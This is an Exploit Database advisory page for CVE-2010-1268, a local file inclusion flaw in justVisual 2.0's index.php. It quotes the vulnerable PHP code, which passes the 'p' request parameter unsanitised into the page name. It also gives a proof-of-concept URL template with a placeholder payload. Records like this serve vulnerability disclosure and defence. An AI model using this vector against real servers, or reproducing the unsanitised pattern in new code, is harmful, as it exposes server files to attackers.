Exploit Database - Logo

justVisual 2.0 - 'index.php' Local File Inclusion

EDB-ID: 11876 Author: eidelweiss Published: 2010-03-25
CVE: CVE-2010-1268 Type: Webapps Platform: PHP
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
#########################################################################
	justVisual 2.0 (index.php) <= LFI Vulnerability
#########################################################################

[+]Title:	justVisual 2.0 (index.php) Local File Vulnerability
[+]Version:	2.0
[+]License:	http://www.gnu.org/copyleft/gpl.html
[+]Download:	http://fh54.de/justVisual/packages/justVisual2.zip
[+]Risk:	Medium
[+]Local:	Yes
[-]Remote:	No

###########################################################
[!]Author:  eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends
###########################################################

-=[ VULN CODE ]=-

	$selfname=basename($_SERVER['PHP_SELF'],'.php'); 
	if(isset($_GET['p']) && !empty($_GET['p'])) {
		//$selfname=basename($_GET['p'],'.php');
		$selfname=str_replace('.php','',$_GET['p']);


-=[ P0C ]=-

	Http://127.0.0.1/index.php?p=[LFI]

###############################=[E0F]=###################################
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2010-1268
Trying to match OSVDBs (1): 63156
Other Possible E-DB Search Terms: justVisual 2.0,  justVisual
Date D V Title Author
2009-07-30 Verified justVisual 1.2 - 'fs_jVroot' Remote File InclusionSirGod
Menu